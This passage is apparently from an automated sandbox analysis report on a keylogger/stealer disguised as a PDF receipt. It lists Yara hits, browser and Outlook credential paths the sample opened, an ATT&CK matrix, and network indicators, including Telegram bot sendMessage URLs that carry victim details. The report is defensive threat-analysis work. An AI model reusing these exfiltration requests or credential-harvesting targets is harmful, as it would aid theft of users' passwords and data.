                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Users\user\AppData\Roaming\teXfNv.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Users\user\AppData\Roaming\teXfNv.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 8008, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 8008, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 8008, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory11
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592453 Sample: rDEKONT-1_16_2025__75kb__pdf.exe Startdate: 16/01/2025 Architecture: WINDOWS Score: 100 48 reallyfreegeoip.org 2->48 50 api.telegram.org 2->50 52 2 other IPs or domains 2->52 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 64 12 other signatures 2->64 8 rDEKONT-1_16_2025__75kb__pdf.exe 7 2->8         started        12 teXfNv.exe 5 2->12         started        signatures3 60 Tries to detect the country of the analysis system (by using the IP) 48->60 62 Uses the Telegram API (likely for C&C communication) 50->62 process4 file5 34 C:\Users\user\AppData\Roaming\teXfNv.exe, PE32 8->34 dropped 36 C:\Users\user\...\teXfNv.exe:Zone.Identifier, ASCII 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmpB0EF.tmp, XML 8->38 dropped 40 C:\...\rDEKONT-1_16_2025__75kb__pdf.exe.log, ASCII 8->40 dropped 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 powershell.exe 23 8->14         started        17 rDEKONT-1_16_2025__75kb__pdf.exe 15 2 8->17         started        20 schtasks.exe 1 8->20         started        72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 teXfNv.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 26 WmiPrvSE.exe 14->26         started        28 conhost.exe 14->28         started        42 checkip.dyndns.com 132.226.247.73, 49733, 49737, 49740 UTMEMUS United States 17->42 44 api.telegram.org 149.154.167.220, 443, 49764, 49775 TELEGRAMRU United Kingdom 17->44 46 reallyfreegeoip.org 104.21.64.1, 443, 49734, 49735 CLOUDFLARENETUS United States 17->46 30 conhost.exe 20->30         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 32 conhost.exe 24->32         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  rDEKONT-1_16_2025__75kb__pdf.exe28%VirustotalBrowse
                  rDEKONT-1_16_2025__75kb__pdf.exe26%ReversingLabsWin32.Trojan.Sonbokli
                  rDEKONT-1_16_2025__75kb__pdf.exe100%AviraHEUR/AGEN.1310400
                  rDEKONT-1_16_2025__75kb__pdf.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\teXfNv.exe100%AviraHEUR/AGEN.1310400
                  C:\Users\user\AppData\Roaming\teXfNv.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\teXfNv.exe26%ReversingLabsWin32.Trojan.Sonbokli
                  C:\Users\user\AppData\Roaming\teXfNv.exe28%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.64.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.fontbureau.com/designersGrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTherDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers?rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.tiro.comrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003E14000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 